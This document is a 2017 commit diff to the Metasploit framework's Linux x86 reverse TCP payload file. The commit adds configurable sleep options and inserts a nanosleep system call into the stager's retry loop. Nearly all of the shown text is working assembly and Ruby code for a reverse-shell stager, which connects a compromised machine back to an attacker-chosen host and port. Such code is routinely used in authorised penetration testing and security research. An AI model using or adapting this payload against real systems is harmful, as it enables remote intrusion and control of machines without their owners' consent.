add sleepSeconds, sleepNanoseconds option

2017-07-29 20:55:53 +09:00 · 2017-07-29 20:55:53 +09:00 · bc6f19a919
parent b1e26dd17e
commit bc6f19a919
1 changed files with 13 additions and 2 deletions
--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@ -29,6 +29,8 @@ module Payload::Linux::ReverseTcp
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
      retry_count: datastore['ReverseConnectRetries'],
+      sleep_seconds:  datastore['SleepSeconds'],
+      sleep_nanoseconds:  datastore['SleepNanoseconds'],
      reliable:    false
    }

@ -85,10 +87,12 @@ module Payload::Linux::ReverseTcp
  #
  def asm_reverse_tcp(opts={})
    # TODO: reliability is coming
-    retry_count  = [opts[:retry_count].to_i, 1].max
+    retry_count  = opts[:retry_count]
    reliable     = opts[:reliable]
-    encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
+    encoded_port = "0x%.8x" % [opts[:port].to_i, 2].pack("vn").unpack("N").first
    encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
+    sleep_seconds = (opts[:sleep_seconds] || 5).to_i
+    sleep_nanoseconds = (opts[:sleep_nanoseconds] || 0).to_i

    asm = %Q^
        push #{retry_count}        ; retry counter
@ -124,6 +128,13 @@ module Payload::Linux::ReverseTcp
        jns mprotect

      handle_failure:
+        push 0xa2
+        pop eax
+        push #{sleep_nanoseconds}
+        push #{sleep_seconds}
+        mov ebx, esp
+        xor ecx, ecx
+        int 0x80                   ; sys_nanosleep
        dec esi
        jnz create_socket
        jmp failed